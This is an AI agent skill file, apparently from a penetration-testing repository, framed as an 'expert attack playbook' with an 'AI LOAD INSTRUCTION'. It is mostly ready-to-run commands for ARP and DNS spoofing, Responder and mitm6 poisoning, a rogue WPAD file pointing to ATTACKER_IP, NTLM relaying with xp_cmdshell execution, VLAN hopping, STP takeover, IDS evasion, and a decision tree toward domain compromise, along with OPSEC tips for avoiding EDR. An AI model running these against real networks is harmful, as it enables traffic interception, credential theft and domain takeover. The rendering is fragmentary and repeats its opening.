SKILL: Network Protocol Attacks — Expert Attack Playbook AI LOAD INSTRUCTION : Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation. 0. RELATED ROUTING Before going deep, consider loading: - tunneling-and-pivoting after establishing MitM position for traffic redirection - ntlm-relay-coercion for relaying cap…

:'PASSWORD' -dc-ip DC_IP\n\n# 2. Use ticket\nexport KRB5CCNAME=administrator.ccache\nsecretsdump.py -k -no-pass TARGET.domain.com\n```\n\n---\n\n## 5. TROUBLESHOOTING\n\n| Issue | Cause | Fix |\n|---|---|---|\n| No hashes captured | LLMNR/NBT-NS disabled via GPO | Try mitm6 (DHCPv6 is harder to disable) |\n| Only machine accounts | Machines query more than users | Wait, trigger user queries (e.g., phish link to `\\\\attacker\\share`) |\n| Relay fails \"signing required\" | Target enforces SMB signing | Relay to LDAP/HTTP/MSSQL instead |\n| mitm6 no response | IPv6 disabled on target | Fall back to LLMNR/WPAD |\n| NTLMv2 won't crack | Strong password | Use relay, don't waste time cracking |\n| Responder conflicts | Another LLMNR responder on network | Check for legitimate WPAD/LLMNR, use `-A` mode first |\n\n---\n\n## 6. OPSEC CONSIDERATIONS\n\n- Run Responder in analyze mode (`-A`) first to assess traffic\n- Limit poisoning to specific targets to reduce noise\n- Use `--lm` flag in Responder only if NTLMv1 downgrade is needed\n- mitm6 affects all hosts on segment — use `-hw` to filter targets\n- Clean up DHCPv6 leases after attack (they persist ~300 seconds)\n- Monitor for AV/EDR alerting on tool signatures\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":6431,"content_sha256":"a18f634a9bf6664fc4d2b3e8afe8e398c0b366165d3e2e7487a6d43302ea105c"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"SKILL: Network Protocol Attacks — Expert Attack Playbook","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"AI LOAD INSTRUCTION","type":"text","marks":[{"type":"strong"}]},{"text":": Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"0. RELATED ROUTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Before going deep, consider loading:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"tunneling-and-pivoting","type":"text","marks":[{"type":"link","attrs":{"href":"../tunneling-and-pivoting/SKILL.md","title":null}}]},{"text":" after establishing MitM position for traffic redirection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ntlm-relay-coercion","type":"text","marks":[{"type":"link","attrs":{"href":"../ntlm-relay-coercion/SKILL.md","title":null}}]},{"text":" for relaying captured NTLM hashes from poisoning attacks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"unauthorized-access-common-services","type":"text","marks":[{"type":"link","attrs":{"href":"../unauthorized-access-common-services/SKILL.md","title":null}}]},{"text":" for exploiting services discovered during network attacks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"traffic-analysis-pcap","type":"text","marks":[{"type":"link","attrs":{"href":"../traffic-analysis-pcap/SKILL.md","title":null}}]},{"text":" for analyzing captured traffic from MitM","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Advanced Reference","type":"text"}]},{"type":"paragraph","content":[{"text":"Also load ","type":"text"},{"text":"NAME_RESOLUTION_POISONING.md","type":"text","marks":[{"type":"link","attrs":{"href":"./NAME_RESOLUTION_POISONING.md","title":null}}]},{"text":" when you need:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detailed Responder/mitm6 configuration and workflows","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"NTLM relay target selection and chaining","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Credential format analysis and cracking priorities","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"1. ARP SPOOFING","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Gratuitous ARP — MitM Positioning","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# arpspoof (dsniff suite)\necho 1 > /proc/sys/net/ipv4/ip_forward\narpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &\narpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &\n\n# ettercap — ARP poisoning with sniffing\nettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//\n\n# bettercap — modern framework\nbettercap -iface eth0\n> set arp.spoof.targets VICTIM_IP\n> arp.spoof on\n> net.sniff on","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Selective Targeting","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# bettercap — target specific hosts, avoid detection\n> set arp.spoof.targets 10.0.0.50,10.0.0.51\n> set arp.spoof.fullduplex true\n> set arp.spoof.internal true\n> arp.spoof on","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Detection Indicators","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Duplicate MAC addresses in ARP table","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Gratuitous ARP storms from non-gateway IPs","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Tools: ","type":"text"},{"text":"arpwatch","type":"text","marks":[{"type":"code_inline"}]},{"text":", static ARP entries, 802.1X port authentication","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"2. LLMNR / NBT-NS / mDNS POISONING","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Responder — Credential Capture","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic poisoning (LLMNR + NBT-NS + mDNS)\nresponder -I eth0 -dwPv\n\n# Key flags:\n# -d Enable answers for DHCP broadcast requests (fingerprinting)\n# -w Start WPAD rogue proxy\n# -P Force NTLM auth for WPAD\n# -v Verbose\n\n# Analyze mode only (passive, no poisoning)\nresponder -I eth0 -A","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Captured Hash Formats","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Protocol","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Hash Type","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Hashcat Mode","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Crackability","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NTLMv1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NetNTLMv1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"5500","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Fast — rainbow tables viable","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NTLMv2","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NetNTLMv2","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"5600","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Moderate — dictionary + rules","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NTLMv1-ESS","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"NetNTLMv1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"5500","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Fast — same as NTLMv1","type":"text"}]}]}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Crack captured hashes\nhashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule\njohn --format=netntlmv2 hashes.txt --wordlist=wordlist.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Relay Instead of Crack","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# ntlmrelayx — relay captured NTLM to other services\nntlmrelayx.py -tf targets.txt -smb2support\nntlmrelayx.py -t ldaps://DC01 --delegate-access # RBCD attack\nntlmrelayx.py -t mssql://DB01 -q \"exec xp_cmdshell 'whoami'\"","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"3. WPAD ABUSE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Responder with WPAD proxy\nresponder -I eth0 -wPv\n\n# WPAD flow:\n# 1. Client queries DHCP for WPAD → DNS for wpad.domain.com → LLMNR/NBT-NS\n# 2. Responder answers with rogue wpad.dat\n# 3. Browser uses attacker's proxy → forced NTLM auth → credential capture","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Manual WPAD PAC File","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"javascript"},"content":[{"text":"// Rogue wpad.dat content\nfunction FindProxyForURL(url, host) {\n return \"PROXY ATTACKER_IP:3128; DIRECT\";\n}","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"4. DHCPv6 ATTACK — mitm6","type":"text"}]},{"type":"paragraph","content":[{"text":"Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# mitm6 → DNS takeover → NTLM relay\nmitm6 -d domain.com\n\n# In parallel: relay captured NTLM to LDAP(S) for delegation\nntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access\n\n# Attack chain:\n# 1. mitm6 answers DHCPv6 → sets attacker as IPv6 DNS\n# 2. Victim DNS queries go to attacker → WPAD redirect\n# 3. Forced NTLM auth → relay to LDAP → create machine account or RBCD","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Key Conditions","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SMB signing disabled on targets (for SMB relay)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"LDAP signing not enforced on DC (for LDAP relay)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Domain Computers quota > 0 (for machine account creation, default: 10)","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"5. VLAN HOPPING","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Switch Spoofing (DTP)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# yersinia — DTP attack to negotiate trunk\nyersinia dtp -attack 1 -interface eth0\n\n# frogger.sh — automated VLAN hopping via DTP\n./frogger.sh\n# Sends DTP frames → switch enables trunking → access all VLANs\n\n# After trunk established:\nmodprobe 8021q\nvconfig add eth0 TARGET_VLAN\nifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Double Tagging (802.1Q)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Craft double-tagged frame: outer=native VLAN, inner=target VLAN\n# scapy:\nfrom scapy.all import *\npkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst=\"TARGET\")/ICMP()\nsendp(pkt, iface=\"eth0\")\n\n# Limitation: one-way only (responses go to real gateway)\n# Effective for blind attacks (e.g., targeting a server)","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Mitigation","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Disable DTP: ","type":"text"},{"text":"switchport nonegotiate","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set native VLAN to unused: ","type":"text"},{"text":"switchport trunk native vlan 999","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Prune VLANs: only allow needed VLANs on trunk ports","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"6. STP MANIPULATION","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Root Bridge Claim","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# yersinia — claim root bridge with lowest priority\nyersinia stp -attack 4 -interface eth0\n\n# Send BPDUs with priority 0 → become root bridge\n# All traffic flows through attacker → MitM","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Topology Change Attack","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Send TC (Topology Change) BPDUs → force MAC table flush\nyersinia stp -attack 1 -interface eth0\n# Switches flood all ports temporarily → sniff traffic","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Mitigation","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BPDU Guard on access ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Root Guard on designated ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"spanning-tree portfast bpduguard enable","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"7. DNS SPOOFING","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"DNS Cache Poisoning","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# bettercap DNS spoofing\nbettercap -iface eth0\n> set dns.spoof.domains target.com, *.target.com\n> set dns.spoof.address ATTACKER_IP\n> dns.spoof on\n\n# ettercap DNS spoofing (via etter.dns config)\necho \"target.com A ATTACKER_IP\" >> /etc/ettercap/etter.dns\nettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Kaminsky Attack Variant","type":"text"}]},{"type":"paragraph","content":[{"text":"Flood recursive resolver with forged responses for random subdomains, each including a malicious authority section pointing the NS record to attacker-controlled server.","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"8. IPv6 ATTACKS","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Router Advertisement Spoofing","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Send rogue RA → victim configures attacker as default gateway\natk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64\n\n# THC-IPv6 suite for comprehensive IPv6 attacks\natk6-parasite6 eth0 # ICMPv6 neighbor spoofing\natk6-redir6 eth0 ... # Traffic redirection via ICMPv6 redirect","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SLAAC Abuse","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Advertise rogue prefix → victim auto-configures IPv6 address\n# Combined with rogue DNS (RA option) → full MitM over IPv6\n# Windows prioritizes IPv6 over IPv4 by default","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"9. IDS/IPS EVASION","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Technique","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Method","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Tool/Flag","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"IP Fragmentation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Split payload across fragments","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"nmap -f","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"fragroute","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"TTL Manipulation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Set TTL to expire at IDS but reach target","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"fragroute","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Encoding Evasion","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"URL/Unicode/hex encoding","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Manual, custom scripts","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Session Splicing","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Split TCP payload across segments","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"fragroute","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"nmap --data-length","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Timing-Based","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Slow scan to avoid rate-based detection","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"nmap -T0","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"nmap -T1","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Decoy Scanning","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Mix real scan with decoy source IPs","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"nmap -D RND:10","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Idle/Zombie Scan","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Use idle host as scan proxy","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"nmap -sI ZOMBIE_IP","type":"text","marks":[{"type":"code_inline"}]}]}]}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# fragroute — fragment and reorder packets\necho \"ip_frag 8\" > /tmp/frag.conf\necho \"order random\" >> /tmp/frag.conf\nfragroute -f /tmp/frag.conf TARGET_IP\n\n# nmap evasion combinations\nnmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"10. DECISION TREE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Network access obtained — want to escalate via network attacks\n│\n├── On same broadcast domain as targets?\n│ ├── YES → ARP spoof for MitM (§1)\n│ │ └── Capture plaintext creds or redirect traffic\n│ └── NO → need VLAN hopping first (§5)\n│ ├── DTP enabled? → switch spoofing\n│ └── Know native VLAN? → double tagging\n│\n├── Windows environment?\n│ ├── LLMNR/NBT-NS enabled? (default YES)\n│ │ └── Run Responder (§2) → capture NetNTLM hashes\n│ │ ├── NTLMv1? → crack fast or relay\n│ │ └── NTLMv2? → relay (§2) or crack with rules\n│ │\n│ ├── WPAD configured or auto-detect? → WPAD abuse (§3)\n│ │\n│ └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)\n│ └── LDAP relay → RBCD → domain compromise\n│\n├── Need DNS control?\n│ ├── MitM already established? → DNS spoofing (§7)\n│ └── DHCPv6 available? → mitm6 for DNS takeover (§4)\n│\n├── Managed switches with weak config?\n│ ├── BPDU Guard off? → STP root bridge claim (§6)\n│ └── DTP enabled? → VLAN hopping (§5)\n│\n├── IPv6 attack surface?\n│ └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6\n│\n└── IDS/IPS in path?\n └── Apply evasion techniques (§9) — fragmentation, timing, encoding","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"network-protocol-attacks","author":"@skillopedia","source":{"stars":853,"repo_name":"hack-skills","origin_url":"https://github.com/yaklang/hack-skills/blob/HEAD/skills/network-protocol-attacks/SKILL.md","repo_owner":"yaklang","body_sha256":"92ea90aac9e2ef3872a4a8263692a43336478a79337fbbeb30895de2560f3ed7","cluster_key":"96408df5f3eb06e58b103a12ffcadec15e1916c20f885b506a2d2d7b7d4efb6d","clean_bundle":{"format":"clean-skill-bundle-v1","source":"yaklang/hack-skills/skills/network-protocol-attacks/SKILL.md","attachments":[{"id":"9c3e0141-15c9-58b9-977c-bfd564bd252a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/9c3e0141-15c9-58b9-977c-bfd564bd252a/attachment.md","path":"NAME_RESOLUTION_POISONING.md","size":6431,"sha256":"a18f634a9bf6664fc4d2b3e8afe8e398c0b366165d3e2e7487a6d43302ea105c","contentType":"text/markdown; charset=utf-8"}],"bundle_sha256":"98f7559d2ed213d136b29f6e9de2752c786c8f268693fd95f01c270b75572b99","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/network-protocol-attacks/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Network protocol attack playbook. Use when exploiting layer 2/3 protocols including ARP spoofing, LLMNR/NBT-NS/mDNS poisoning, WPAD abuse, DHCPv6 attacks, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion."}},"renderedAt":1782979385627}

SKILL: Network Protocol Attacks — Expert Attack Playbook AI LOAD INSTRUCTION : Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation. 0. RELATED ROUTING Before going deep, consider loading: - tunneling-and-pivoting after establishing MitM position for traffic redirection - ntlm-relay-coercion for relaying cap…